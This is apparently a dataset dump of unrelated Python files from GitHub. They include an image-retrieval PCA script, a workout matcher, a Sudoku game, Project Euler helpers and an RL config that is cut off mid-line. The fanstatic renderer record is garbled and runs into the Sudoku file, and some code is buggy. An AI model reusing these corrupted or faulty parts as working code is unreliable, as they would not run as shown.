calculateParallel(image_descs, threads=16)\n\n\n # make one matrix with all FVs\n image_fvs = np.vstack(image_fvs)\n pca_transform_fvs = myPCA(image_fvs, 256)\n image_fvs_ = pca_transform_fvs.transform(image_fvs)\n print(\"FVS shape is: {}\".format(image_fvs_.shape))\n\n # power-normalization\n image_fvs_ = np.sign(image_fvs_) * np.abs(image_fvs_) ** 0.5\n\n # L2 normalize\n image_fvs_ = normalize(image_fvs_, norm='l2', axis=1)\n\n print(\"Computation executed in: {}s\".format(time.time() - t))\n\n # Save FVS PCA\n joblib.dump(pca_transform_fvs, 'pca_transform_fvs.pkl')\n\n\n # Save processed vectors that must be insert in the DB\n h5f = h5py.File(\"image_fvs.h5\", 'w')\n h5f.create_dataset('image_fvs', data=np.real(image_fvs_))\n h5f.close()\n\n print(\"YAEL SCRIPT: Mission accomplished!\")\n return \"YAEL SCRIPT: Mission accomplished!\"\n\n\ndef myPCA(matrix, dim):\n print(\"Start calculating PCA of dim %s starting by %s\") % (dim, matrix.shape)\n t1 = time.time()\n pca = PCA(n_components=dim)\n pca.fit(matrix)\n print(\"PCA calculated in %s\") % (time.time() - t1)\n return pca\n\n\nprocess()\n","repo_name":"fede-vaccaro/image-retrieval-web-engine","sub_path":"yael_script_window.py","file_name":"yael_script_window.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"33653532050","text":"from ast import keyword\nimport json\nimport difflib\n\ndb = open('workouts.json', 'r', encoding=\"utf-8\")\njson_db = json.load(db)\n\n\ndef format_entry(str, format):\n form_str = []\n for char in str:\n if(char.isdigit()):\n break\n else:\n form_str.append(char)\n return ''.join(form_str)+format\n\n\ndef map_ids(str, format):\n hold_list = [row['activity_name'] for row in json_db]\n best_matches = []\n for entry in str:\n best_match = difflib.get_close_matches(format_entry(\n entry, format=\"GYM\"), hold_list, n=1, cutoff=0.6)\n for row in json_db:\n if (row['activity_name'] == best_match[0]):\n best_matches.append(row)\n\n for n in best_matches:\n print(n)\n print('\\n')\n\n\nmap_ids(['Glute bridge with a band 20 reps', 'Goblet squat 20 reps', 'Fire hydrant 12 reps per side',\n 'Split squat 12 reps per leg', 'Sumo squat 20 reps'], format='GYM')\n\ndb.close()\n\n\n# ['Glute bridge with a band 20 reps', 'Goblet squat 20 reps', 'Fire hydrant 12 reps per side', 'Split squat 12 reps per leg', 'Sumo squat 20 reps']\n# ('Glute bridge to chest press GYM', '211', 'Glute bridge with a band 20 reps')\n# ('Goblet squat with a band GYM', '289', 'Goblet squat 20 reps')\n# ('Fire hydrant GYM', '262', 'Fire hydrant 12 reps per side')\n# ('Split Squat GYM', '263', 'Split squat 12 reps per leg')\n","repo_name":"Iurybub/JG_App","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14343251464","text":"\"\"\"\n给定一个数字,我们按照如下规则把它翻译为字符串:0翻译成“a”, 1翻译成“b”, ..... 11 翻译成“l”,...... 25 翻译成\"z\"。\n一个数字可能���多个翻译。例如, 12258有5种不同的翻译,分别是bccfi,bwfi, bczi, mcfi, mzi。\n请编程实现一个函数,用来计算一个数字有多少种不同的翻译方法。\n\"\"\"\nclass Solution(object):\n def translation_count(self, num):\n if len(num) < 1:\n return 0\n elif len(num) == 1:\n return 1\n elif len(num) == 2:\n return 2 if int(num) <= 25 else 1\n double = 0\n if int(num[:1]) <= 25:\n double = self.translation_count(num[2:])\n signal = self.translation_count(num[1:])\n return signal + double\n\nif __name__ == '__main__':\n s = Solution()\n print(s.translation_count(num=str(12258)))","repo_name":"yuyaxiong/interveiw_algorithm","sub_path":"剑指offer/把数字翻译成字符串.py","file_name":"把数字翻译成字符串.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42328190341","text":"# encoding: utf-8\n\nimport fanstatic.core as core\n\n\nclass CkanCustomRenderer(object):\n ''' Allows for in-line js and IE conditionals via fanstatic. '''\n def __init__(self, script=None, renderer=None, condition=None,\n other_browsers=False):\n self.script = script\n self.other_browsers = other_browsers\n self.renderer = renderer\n start = ''\n end = ''\n # IE conditionals\n if condition:\n start = ''\n if other_browsers:\n start += ''\n end = ' [[r1], [r2], ...[r9]]\n validate interactive cli game input\n row checker\n column checker\n box checker\n board checker\n replace func (prolly custom?) <-- look this up...\n print the solved board out\n\noutput:\n solved board\n no brackets\n spaces between numbers\n possibly add lines\n\nnext:\n implement with pygame for better visuals\n optimization!\n'''\n\n'''\nDani suggestion/approval...\nI think a sudoku game would be within scope for this intensive,\nand the solver could be your bike or car, approved\n'''\n# readline prevents NULL from being submitted via cli\nimport os, sys, random, copy, math\nimport pygame as pg\nfrom pygame.locals import *\n\nsys.setrecursionlimit(10000)\n\nbox_coords = {1: [(0, 0), (0, 1), (0, 2), (1, 0), (1, 1), (1, 2), (2, 0), (2, 1), (2, 2)], \n2: [(0, 3), (0, 4), (0, 5), (1, 3), (1, 4), (1, 5), (2, 3), (2, 4), (2, 5)], \n3: [(0, 6), (0, 7), (0, 8), (1, 6), (1, 7), (1, 8), (2, 6), (2, 7), (2, 8)], \n4: [(3, 0), (3, 1), (3, 2), (4, 0), (4, 1), (4, 2), (5, 0), (5, 1), (5, 2)], \n5: [(3, 3), (3, 4), (3, 5), (4, 3), (4, 4), (4, 5), (5, 3), (5, 4), (5, 5)], \n6: [(3, 6), (3, 7), (3, 8), (4, 6), (4, 7), (4, 8), (5, 6), (5, 7), (5, 8)], \n7: [(6, 0), (6, 1), (6, 2), (7, 0), (7, 1), (7, 2), (8, 0), (8, 1), (8, 2)], \n8: [(6, 3), (6, 4), (6, 5), (7, 3), (7, 4), (7, 5), (8, 3), (8, 4), (8, 5)], \n9: [(6, 6), (6, 7), (6, 8), (7, 6), (7, 7), (7, 8), (8, 6), (8, 7), (8, 8)]}\n\nif not pg.font: print('Warning, fonts disabled')\nif not pg.mixer: print('Warning, sound disabled')\n\ndef parse_board(input):\n '''Take the input string from the command line and convert it into something usable'''\n usable = []\n temp = []\n for ind, num in enumerate(input):\n if (ind+1)%9 != 0:\n temp.append(int(num))\n else:\n temp.append(int(num))\n usable.append(temp)\n temp = []\n return usable\n\ndef input_validator(input_string):\n '''Validate the integers given via the cli\n input_string - the prompt for the python inupt() function'''\n valid_input = False\n while not valid_input:\n try:\n testing_input = input(input_string)\n if not testing_input.isnumeric():\n print(\"Only numbers, please try again!\")\n elif int(testing_input) < 1 or int(testing_input) > 9:\n print(\"Must be between 1 and 9\")\n else:\n valid_input = True\n return int(testing_input)\n except EOFError:\n print(\"Not a number! Try again.\")\n continue\n\ndef row_checker(board, num, row):\n '''Return True if the number (num) is in the specified row (row)'''\n if num in board[row]:\n return True\n return False\n\ndef col_checker(board, num, col):\n '''Check if the number (num) is in the specified column (col)'''\n for row in board:\n if num == row[col]:\n return True\n return False\n\ndef box_checker(board, num, box):\n '''\n Checks if the number (num) is in the box (box)\n '''\n # get box based on coordinate pair\n if isinstance(box, tuple):\n for key, value in box_coords.items():\n if box in value:\n box = key\n\n coords = box_coords[box]\n for coord in coords:\n if num == board[coord[0]][coord[1]]:\n return True\n return False\n\ndef board_checker(board):\n '''Final check to make sure that the board is properly solved'''\n for i in range(1, 10):\n for c in range(9):\n if not (row_checker(board, i, c) and col_checker(board, i, c) and box_checker(board, i, c+1)):\n return False\n return True\n\ndef get_row(board, row):\n '''Return a list of all numbers placed within the specified row'''\n row_nums = []\n for num in board[row-1]:\n if num != 0:\n row_nums.append(num)\n return row_nums\n\ndef get_column(board, col):\n '''Return a list of all numbers placed within the specified column'''\n column = []\n for row in board:\n if row[col-1] != 0:\n column.append(row[col-1])\n return column\n\ndef get_box(board, box):\n '''Return a list of all numbers placed within the specified box'''\n box_nums = []\n coord_list = box_coords[box]\n for coords in coord_list:\n num = board[coords[0]][coords[1]]\n if num != 0:\n box_nums.append(num)\n return box_nums\n\ndef duplicate_checker(board):\n '''Checks rows, columns, and boxes for any duplicates \n returns (the integer of the r/c/b, and a char of 'r','c','b') if there are duplicates\n returns (0, empty string) if there are no duplicates'''\n # possibly return the number that is duplicated\n for i in range(1, 10):\n row = get_row(board, i)\n col = get_column(board, i)\n box = get_box(board, i)\n if len(row) != len(set(row)):\n return (i, 'r')\n if len(col) != len(set(col)):\n return (i, 'c')\n if len(box) != len(set(box)):\n return (i, 'b') \n return (0, '')\n\ndef generate_col(board, col):\n # generate numbers to go into the column\n col_pool = [1,2,3,4,5,6,7,8,9]\n placed = get_column(board, col)\n for num in placed:\n col_pool.remove(num)\n random.shuffle(col_pool)\n # garuntee no repeats in rows or boxes\n need_to_reshuffle = True\n while need_to_reshuffle:\n for ind, row in enumerate(board):\n if ind+1 < len(board):\n if row_checker(board, col_pool[ind], ind+1):\n random.shuffle(col_pool)\n need_to_reshuffle = True\n check_box = False\n break\n else:\n need_to_reshuffle = False\n check_box = True\n break\n if check_box:\n if box_checker(board, col_pool[0], math.ceil(col/3)) or box_checker(board, col_pool[1], math.ceil(col/3)):\n random.shuffle(col_pool)\n need_to_reshuffle = True\n else:\n need_to_reshuffle = False\n return col_pool\n\ndef generate_box(board, box):\n box_pool = [1,2,3,4,5,6,7,8,9]\n placed = get_box(board, box)\n for num in placed:\n box_pool.remove(num)\n return box_pool\n \ndef generate_row(board, row):\n row_pool = [1,2,3,4,5,6,7,8,9]\n placed = get_row(board, row)\n for num in placed:\n row_pool.remove(num)\n return row_pool\n\ndef fill_row(board, row, filler):\n while len(filler) != 0:\n for ind, spot in enumerate(board[row-1]):\n to_remove = []\n if spot == 0:\n for num in filler:\n if not col_checker(board, num, ind) and not box_checker(board, num, (row, ind)):\n board[row-1][ind] = num\n to_remove.append(num)\n break\n for num in to_remove:\n filler.remove(num)\n if len(to_remove) == 0:\n break\n return board\n\ndef fill_col(board, col, filler):\n for ind, row in enumerate(board):\n if row[col-1] == 0:\n board[ind][col-1] = filler[ind-1]\n return board\n\ndef fill_box(board, box, filler):\n '''fill in the specified box with a list of numbers (filler)'''\n for coords in box_coords[box]:\n to_remove = []\n spot = board[coords[0]][coords[1]]\n if spot == 0:\n for num in filler:\n if not row_checker(board, num, coords[0]) and not col_checker(board, num, coords[1]):\n board[coords[0]][coords[1]] = num\n to_remove.append(num)\n break\n for number in to_remove:\n filler.remove(number)\n return board\n\ndef generator():\n '''Generates a 2D array that is a solvable 9x9 SuDoKu board'''\n # start from solved and slowly subtract\n # randomly generate the first row and then\n # r1 --> c1 --> b1 --> c4 --> b2 --> c7 --> b3\n # r4 --> b4,5,6\n # r7 --> b7,8,9\n # pool of numbers\n init_pool = [1,2,3,4,5,6,7,8,9]\n # initialize empty board\n board = [[0, 0, 0, 0, 0, 0, 0, 0, 0], \n [0, 0, 0, 0, 0, 0, 0, 0, 0], \n [0, 0, 0, 0, 0, 0, 0, 0, 0], \n [0, 0, 0, 0, 0, 0, 0, 0, 0], \n [0, 0, 0, 0, 0, 0, 0, 0, 0], \n [0, 0, 0, 0, 0, 0, 0, 0, 0], \n [0, 0, 0, 0, 0, 0, 0, 0, 0], \n [0, 0, 0, 0, 0, 0, 0, 0, 0], \n [0, 0, 0, 0, 0, 0, 0, 0, 0]]\n # 1st row\n board[0] = random.sample(init_pool, 9)\n # generate and place the 1st column\n c1_pool = generate_col(board, 1)\n board = fill_col(board, 1, c1_pool)\n # generate and place the first box\n b1_pool = generate_box(board, 1)\n board = fill_box(board, 1, b1_pool)\n # generate and place the 4th column\n c4_pool = generate_col(board, 4)\n board = fill_col(board, 4, c4_pool)\n # generate and place the second box\n b2_pool = generate_box(board, 2)\n board = fill_box(board, 2, b2_pool)\n # generate and place the 7th column\n c7_pool = generate_col(board, 7)\n board = fill_col(board, 7, c7_pool)\n # generate and place the third box\n b3_pool = generate_box(board, 3)\n board = fill_box(board, 3, b3_pool)\n # generate and place the 4th row\n r4_pool = generate_row(board, 4)\n board = fill_row(board, 4, r4_pool)\n # generate and place the fourth box\n b4_pool = generate_box(board, 4)\n board = fill_box(board, 4, b4_pool)\n # generate and place the fifth box\n b5_pool = generate_box(board, 5)\n board = fill_box(board, 5, b5_pool)\n # generate and place the sixth box\n b6_pool = generate_box(board, 6)\n board = fill_box(board, 6, b6_pool)\n # generate and place the 7th row\n r7_pool = generate_row(board, 7)\n board = fill_row(board, 7, r7_pool)\n # generate and place the seventh box\n b7_pool = generate_box(board, 7)\n board = fill_box(board, 7, b7_pool)\n # generate and place the eighth box\n b8_pool = generate_box(board, 8)\n board = fill_box(board, 8, b8_pool)\n # generate and place the ninth box\n b9_pool = generate_box(board, 9)\n board = fill_box(board, 9, b9_pool)\n # make sure generated ba\\oard is solvable\n if not board_checker(board):\n board = generator()\n return board\n\ndef make_puzzle(board):\n '''Randomly removes a number until the board becomes \n unsolvable if the randomly selected number were removed'''\n prev_coords = (random.randint(0,8), random.randint(0,8))\n prev_num = board[prev_coords[0]][prev_coords[1]]\n board[prev_coords[0]][prev_coords[1]] = 0\n while solvable(board):\n prev_coords = (random.randint(0,8), random.randint(0,8))\n prev_num = board[prev_coords[0]][prev_coords[1]]\n board[prev_coords[0]][prev_coords[1]] = 0\n board[prev_coords[0]][prev_coords[1]] = prev_num\n return board\n\ndef solvable(board):\n '''Returns True or False for whether or not the board is solvable'''\n board_copy = copy.deepcopy(board)\n if solver(board_copy) == False:\n return False\n else:\n return True\n\ndef solver(board):\n '''\n return the solved given board \n '''\n # get all coordinates of not filled in numbers\n # try to place 1-9 in those coords\n # via row, col, and box checker\n # while not board_checker\n\n # create and array and populate it with coordinates of spots without numbers\n unplaced_nums = {}\n for i_r, row in enumerate(board):\n for i_c, col in enumerate(row):\n if col == 0:\n unplaced_nums[(i_r, i_c)] = set()\n\n runs = 0\n while not board_checker(board):\n # prolly wont happen but conditional to catch unsolved board without any empty spaces\n if len(unplaced_nums) == 0: \n print('something is messed up')\n break\n to_remove = []\n for coords in unplaced_nums.keys():\n possible_nums = set()\n # find what numbers might work in each square\n for num in range(1, 10):\n if not row_checker(board, num, coords[0]):\n if not col_checker(board, num, coords[1]):\n if not box_checker(board, num, (coords)):\n if num not in possible_nums:\n possible_nums.add(num)\n unplaced_nums[coords].add(num)\n # if there is only one possible number set that in the board\n # and set that coordinate pair to be removed from the list\n if len(possible_nums) == 1:\n # set the spot on the board as the only value in the set of nums\n board[coords[0]][coords[1]] = next(iter(possible_nums))\n to_remove.append(coords)\n runs = 0\n runs += 1\n if runs == 5:\n return False\n # remove all newly placed coordinates\n for coord in to_remove:\n unplaced_nums.pop(coord)\n return board\n\ndef replace(board, num, row, col):\n '''Place the number (num) in the specified row (row)\n and column (col) within the board (board)'''\n board[row-1][col-1] = num\n\ndef printer(board):\n '''Print the board to the terminal formatted in a TBD way'''\n # clear the screen before printing the board\n os.system('clear')\n # length of row divider lines\n width = 45\n print('\\n ', end='')\n #print column numbers\n for i in range(1, 10):\n print(' ' + str(i) + ' ', end='')\n if i%3==0:\n print(' ', end='')\n # print top line of board\n print('\\n\\n ' + '-'*width)\n for i, r in enumerate(board):\n # convert list of ints into string with spaces every 3 numbers\n stringed = ''\n for ind, num in enumerate(r):\n stringed += str(num) \n if ind%3==2:\n stringed += ' '\n # print row number and row of numbers with dividers\n print(str(i+1) + ' | '+' | '.join(stringed))\n # print row sperator\n print(' ' +'-'*width)\n # print box seperator \n if i%3==2 and i!=8:\n print(' '+'-'*width)\n\ndef main_game_loop_func_cli(board):\n solve = ''\n # board is not solved... keep playing\n while not board_checker(board):\n printer(board)\n if solve == '':\n solve = input('Do you want to see this one solved? (Y/n)')\n if solve == 'Y':\n board = solver(board)\n else:\n num = input_validator('What is the number you wish to place on the board? ')\n row = input_validator('What row is that number to go in? ')\n col = input_validator('What column is that number to go in? ')\n replace(board, num, row, col)\n if board_checker(board):\n # board is solved!\n printer(board)\n print('\\nYou have successfully completed this Sudoku puzzle!!')\n new_game = input('Do you want to play again? (Y/n)')\n if new_game == 'Y':\n solve = ''\n board = make_puzzle(generator())\n\ndef main_game_loop_func_pygame(board):\n # pygame keycode and corresponding number\n NUM_KEYS = {48:0, 49:1, 50:2, 51:3, 52:4, 53:5, 54:6, 55:7, 56:8, 57:9}\n # size of sudoku boxes\n r_size = 50\n # initialize pygame and all necassary modules\n pg.init()\n # window size\n screen = pg.display.set_mode((11*r_size, 13*r_size))\n # window title\n pg.display.set_caption('SuDoKu')\n # generate white background surface\n background = pg.Surface(screen.get_size())\n background = background.convert()\n background.fill((250, 250, 250))\n # Draw title inside of window\n if pg.font:\n font = pg.font.Font(None, 36)\n text = font.render(\"SuDoKu!\", 1, (10, 10, 10))\n textpos = text.get_rect(centerx=background.get_width()/2)\n background.blit(text, textpos)\n\n # initialize clock\n clock = pg.time.Clock()\n \n # all of the squares for the sudoku grid\n border_rects = []\n for y in range(1, 10):\n for x in range(1, 10):\n border_rects.append(pg.rect.Rect((x+x*r_size, y+y*r_size),(r_size, r_size)))\n # drawing the squares\n for rect in border_rects:\n pg.draw.rect(background, [0,0,0], rect, 3)\n background.fill([250,250,250], rect=rect)\n \n # generate solver button and text\n solver_button = pg.rect.Rect((background.get_width()//3)-r_size, 11*r_size, r_size*2, r_size)\n pg.draw.rect(background, [0,0,0], solver_button, 3)\n if pg.font:\n font = pg.font.Font(None, 36)\n text = font.render(\"Solve!\", 1, (10, 10, 10))\n textpos = text.get_rect(centerx=background.get_width()//3, centery=11.5*r_size)\n background.blit(text, textpos)\n\n # generate new game button and text\n ng_button = pg.rect.Rect((2*(background.get_width()//3)-1.5*r_size), 11*r_size, r_size*3, r_size)\n pg.draw.rect(background, [0,0,0], ng_button, 3)\n if pg.font:\n font = pg.font.Font(None, 36)\n text = font.render(\"New Game\", 1, (10, 10, 10))\n textpos = text.get_rect(centerx=2*(background.get_width()//3), centery=11.5*r_size)\n background.blit(text, textpos)\n \n # generate box borders\n box_borders = []\n # outer border\n box_borders.append(pg.rect.Rect(r_size, r_size, 9+r_size*9, 9+r_size*9))\n # vertical border box\n box_borders.append(pg.rect.Rect(2+4*r_size, r_size, 4+3*r_size, 9+9*r_size))\n # horizontal border box\n box_borders.append(pg.rect.Rect(r_size, 2+4*r_size, 9+9*r_size, 4+3*r_size))\n \n # store previously clicked rect initialized as false\n prev_clicked = 0\n while 1:\n # 60 fps max\n clock.tick(60)\n # draw border boxes\n for box in box_borders:\n pg.draw.rect(background, [0,0,0], box, 6)\n\n for event in pg.event.get():\n # Exit events\n if event.type == QUIT:\n return\n elif event.type == KEYDOWN and event.key == K_ESCAPE:\n return\n \n # mouse-click handling\n if event.type == pg.MOUSEBUTTONUP:\n # revert the previously state changed square\n if prev_clicked:\n pg.draw.rect(background, [250,250,250], prev_clicked)\n pg.draw.rect(background, [0,0,0], prev_clicked, 1)\n # get mouse position\n pos = pg.mouse.get_pos()\n # find square mouse click is in\n clicked_sqr = [s for s in border_rects if s.collidepoint(pos)]\n # ensure that a square was actually clicked and not something off the board\n if clicked_sqr != []:\n # save clicked square so that the state status can be reset\n prev_clicked = clicked_sqr[0]\n # set state of clicked square\n pg.draw.rect(background, [200,200,200], clicked_sqr[0])\n \n # solve button logic\n if solver_button.collidepoint(pos):\n for rect in border_rects:\n background.fill([250,250,250], rect=rect)\n solver(board)\n printer(board)\n \n if ng_button.collidepoint(pos):\n for rect in border_rects:\n background.fill([250,250,250], rect=rect)\n board = make_puzzle(generator())\n \n # getting the number pressed to change the clicked sqr to\n if event.type == KEYDOWN and event.key in NUM_KEYS.keys():\n # get the number that corresponds to the pygame keycode\n num = NUM_KEYS[event.key]\n # get the box that was clicked\n abs_pos = border_rects.index(prev_clicked)\n # get the row/col within the board\n row = abs_pos//9\n col = abs_pos%9\n # update number in board\n board[row][col] = num\n background.fill([250,250,250], rect=prev_clicked)\n\n # Flatten the board array for easier number placement\n # bc the square list is only 1D\n board_nums = []\n for row in board:\n board_nums.extend(row)\n # Draw in the numbers\n if pg.font:\n font = pg.font.Font(None, 36)\n for ind, sqr in enumerate(border_rects):\n # background.fill([250,250,250], rect=sqr)\n text = font.render(str(board_nums[ind]), 1, (10, 10, 10))\n # position number in the center of all the squares\n textpos = text.get_rect(centerx=sqr.x+(sqr.width/2), centery=sqr.y+(sqr.height/2))\n background.blit(text, textpos)\n # redraws updated screen\n screen.blit(background, (0, 0))\n pg.display.flip()\n \n # change screen to win state!\n if board_checker(board):\n pg.display.update()\n if pg.font:\n # win statement text\n win_text = font.render(\"YOU WIN!!\", 1, (0,0,0))\n win_textpos = win_text.get_rect(centerx=background.get_width()/2, \n centery=10.5*r_size)\n background.blit(win_text, win_textpos)\n # friendly quitting\n pg.quit()\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n preparse_board = sys.argv[1:][0]\n board = parse_board(preparse_board)\n\n board = generator()\n board = make_puzzle(board) \n # printer(board)\n main_game_loop_func_cli(board) \n # main_game_loop_func_pygame(board)\n","repo_name":"Perzival1312/sudoku","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42121221739","text":"#---------------------------------------------------------------------------------------------------------\n#\tPassed an integer, returns a list with digits in that integer\n#---------------------------------------------------------------------------------------------------------\nimport time\nimport csv\nimport sys\nimport winsound\n\ndef is_pandigital(ls):\n if len(ls) != 9:\n return False\n if '1' in ls and '2' in ls and '3' in ls and '4' in ls and '5' in ls and '6' in ls and '7' in ls and '8' in ls and '9' in ls:\n return True\n return False\n\ndef fibonacci(counter, n_minus1 = 0, n_minus2 = 0):\n\tif n_minus1 > 0 and n_minus2 > 0:\n\t\treturn n_minus1 + n_minus2\n\n\telse:\n\t\tn_1 = 1\n\t\tn_2 = 1\n\t\tnum_iter = 2\n\t\tx = 0\n \n\t\twhile(num_iter < counter):\n\t\t\tx = n_1 + n_2\n\t\t\tn_1 = n_2\n\t\t\tn_2 = x\n\t\t\tnum_iter += 1\n\t\treturn x\n\ndef decompose_digit(num):\n\tls = []\n\tremain = num\n\ttemp = num\n\tmagnitude = 10\n\twhile( remain > 0 ):\n\t\ttemp = remain % magnitude\n\t\tls.append( round(temp / (magnitude/10) ) )\t\t# We round to the nearest int to prevent floats near the exact\n\t\tremain -= temp\n\t\tmagnitude *= 10 \t\t\t\t\t# Increases by an order of magnitude\n\t\t\n\treturn ls[::-1] # Reverses the list\n\t\ndef str_to_int(str):\n\tnum = 0\n\tfor i in range(0, len(str)):\n\t\tif i != (len(str) -1):\n\t\t\tnum += (ord(str[i]) - 48)*(10**(len(str) - i -1))\n\t\telse:\n\t\t\tnum += ((ord(str[i]) - 48))\n\treturn num\n\ndef import_csv(file):\n\tls = []\n\twith open(file, 'rt') as f:\n\t\treader = csv.reader(f)\n\t\tfor row in reader:\n\t\t\tls.append(row)\n\treturn ls\t\t\t\t\t\t\t# Change to ls[0] if you only want the first row.\n\ndef write_csv(file, ls):\n\n\tif sys.version_info >= (3,0,0):\n\t\tf = open(file, 'w', newline='')\n\telse:\n\t\tf = open(file, 'wb')\n\twriter = csv.writer(f, delimiter=',',quoting=csv.QUOTE_ALL)\n\twriter.writerow(ls)\n\t\ndef int_to_str(integer, magnitude=10):\n\tnum = ''\n\tcurrent = 0\n\tlast = -1\n\tcurrent_mag = magnitude\n\t\n\twhile (integer % current_mag) != integer:\n\t\tlast = current\n\t\tcurrent = (integer % current_mag) - last\n\t\tcurrent = int(current / (current_mag/magnitude))\n\t\tnum += ( chr( current + 48 ))\n\t\tcurrent_mag *= int(magnitude)\n\tlast = current\n\tcurrent = (integer % current_mag) - last\n\tcurrent = int(current / (current_mag/magnitude))\n\tnum += ( chr( current + 48 ))\n\tnum = num[::-1] # Reverses the string\n\n\treturn num\n#=====================================================================================================\n# Outputs total runtime from 'start' variable\n#=====================================================================================================\n\ndef runtime(start):\n\truntime=time.clock()-start\n\tprint(\"The total program runtime was \",runtime,\" seconds.\")\n\twinsound.Beep(300,2000)\n\t\n#=====================================================================================================\n# Builds a list of ASCII characters when passed a string\n#=====================================================================================================\ndef decompose_string(string):\n\tls=[]\n\tfor i in range(0, len(string)):\n\t\tls.append(string[i])\n\t\treturn ls\n#====================================================================================================\n# Sieve of Eratosthenes algorithm to return prime numbers up to numerical limit\n#==================================================================================================== \ndef primes_sieve(limit):\n\tprimes_ls = []\n\ta = []\n\tfor i in range(limit + 1): # Initialize the primality list\n\t\ta.append(True)\n\ta[0] = a[1] = False\n\n\tmultiplier = 2\n\tfactor = 0\n\tfor i in range(len(a)):\n\t\tif a[i] == True:\n\t\t\tfactor = i*multiplier\n\t\t\twhile factor <= limit:\n\t\t\t\tif factor <= limit:\n\t\t\t\t\ta[factor] = False\n\t\t\t\tmultiplier += 1\t\t\t\t\t# Increments multiplier for next pass\n\t\t\t\tfactor = i*multiplier\n\t\t\tmultiplier = 2\n\t\n\tfor i in range(len(a)):\n\t\tif a[i] == True:\n\t\t\tprimes_ls.append(i)\n\treturn primes_ls\n\t\n#====================================================================================================\n# Rotate string by specified number of chars. Default =1\n#====================================================================================================\ndef rotate(str, rot_num_chars =1):\n\tif rot_num_chars > len(str):\n\t\treturn 'Error!'\n\t\n\ttemp1 = str[0:rot_num_chars]\n\ttemp2 = str[rot_num_chars:]\n\t\n\treturn temp2 + temp1","repo_name":"jbradfield2-718/Python_Project_Euler","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28252813578","text":"import numpy as np\nfrom future.utils import viewitems\nimport os\nimport copy\nfrom rl_pipeline.configuration.configuration import Configuration\n\nimport json\n\nenv_cal = {}\ndefault_config = {\n 'env_name': \"vrep\",\n 'robot': 'jaco',\n 'headless': False,\n # translation_gen can be 'clf', 'cbf', 'clf_cbf', 'dmp', orientation_gen can be 'dmp'\n 'components': {'mdp': True, 'fsa': False, 'translation_gen': 'clf_cbf', 'orientation_gen': 'dmp'},\n 'task': 'switchon',\n 'fsa_save_dir': os.getcwd(),\n 'fsa_name': 'g',\n 'particle_test': False\n}\n\nclass ExperimentConfig(object):\n\n def __init__(self, config={}):\n self.ExperimentConfig_config = Configuration(default_config)\n self.ExperimentConfig_config.update(config)\n\n self.env_name = self.ExperimentConfig_config.get('env_name')\n self.headless = self.ExperimentConfig_config.get('headless')\n self.components = self.ExperimentConfig_config.get('components')\n self.robot = self.ExperimentConfig_config.get('robot')\n\n # used in batch_sampler to post-process rewards\n self.process_rewards = None\n self.Environment = None\n\n self.Environment = self.construct_env()\n\n def construct_env(self):\n #### traj generator ####\n translation_gen = self.components['translation_gen']\n orientation_gen = self.components['orientation_gen'] \n \n traj_gen_type, traj_gen_config = self.construct_traj_generator(translation_gen=translation_gen, orientation_gen=orientation_gen)\n\n #### MDP ####\n if self.components['mdp'] and not self.components['fsa']:\n if self.ExperimentConfig_config.get('task') == 'switchon' and self.robot == 'jaco':\n get_state, get_reward, is_done, state_space, action_space, other = self.switch_task_mdp_config(on_or_off='on')\n else:\n raise ValueError('task and robot not match')\n\n construct_mdp_env_config = {\n 'get_state': get_state,\n 'get_reward': get_reward,\n 'is_done': is_done,\n 'state_space': state_space,\n 'action_space': action_space,\n 'other': other\n }\n mdp_env_type, mdp_env_config = self.construct_mdp_env(mdp_config=construct_mdp_env_config,\n traj_gen_type=traj_gen_type,\n traj_gen_config=traj_gen_config)\n Environment = {\n 'type': mdp_env_type,\n 'config': mdp_env_config\n }\n\n return Environment\n\n #### FSA ####\n elif self.components['mdp'] and self.components['fsa']:\n if self.ExperimentConfig_config.get('task') == 'makehotdog' and self.robot == 'jaco':\n task_spec, construct_state, predicate_robustness, obs_dim = self.get_tl_related(task=self.ExperimentConfig_config.get('task'))\n get_state, get_reward, is_done, state_space, action_space, other = self.makehotdog_task_mdp_config(get_state_fn=construct_state, obs_dim=obs_dim)\n \n elif self.ExperimentConfig_config.get('task') == 'serve' and self.robot == 'baxter':\n task_spec, construct_state, predicate_robustness, obs_dim = self.get_tl_related(task=self.ExperimentConfig_config.get('task'))\n get_state, get_reward, is_done, state_space, action_space, other = self.serve_task_mdp_config(get_state_fn=construct_state, obs_dim=obs_dim)\n \n else:\n raise ValueError('task and robot not match')\n\n\n construct_mdp_env_config = {\n 'get_state': get_state,\n 'get_reward': get_reward,\n 'is_done': is_done,\n 'state_space': state_space,\n 'action_space': action_space,\n 'other': other\n }\n mdp_env_type, mdp_env_config = self.construct_mdp_env(mdp_config=construct_mdp_env_config,\n traj_gen_type=traj_gen_type,\n traj_gen_config=traj_gen_config)\n\n from learning.env.fsa_augmented_env import FsaAugmentedEnv\n\n fsa_augmented_env_config = {\n 'fsa_save_dir': self.ExperimentConfig_config.get('fsa_save_dir'),\n 'dot_file_name': self.ExperimentConfig_config.get('fsa_name'),\n 'svg_file_name': self.ExperimentConfig_config.get('fsa_name'),\n 'robot': self.robot,\n 'base_env': {\n 'type': mdp_env_type,\n 'config': mdp_env_config,\n },\n 'spec': {\n 'predicate_form': task_spec,\n 'predicate_robustness': predicate_robustness\n }\n }\n \n Environment = {\n 'type': FsaAugmentedEnv,\n 'config': fsa_augmented_env_config\n }\n\n return Environment\n else:\n raise ValueError('can not have fsa without mdp')\n return None\n \n \n def construct_mdp_env(self, mdp_config={}, traj_gen_type=None, traj_gen_config=None):\n self.reset = {\n 'type': None,\n 'config': {}\n }\n \n if self.env_name == 'vrep': \n from learning.env.learning_env import LearningEnv\n from cooking_env.env.base.ce import CookingEnv\n\n self.reset = mdp_config['other']['reset']\n \n self.mdp_env_type = 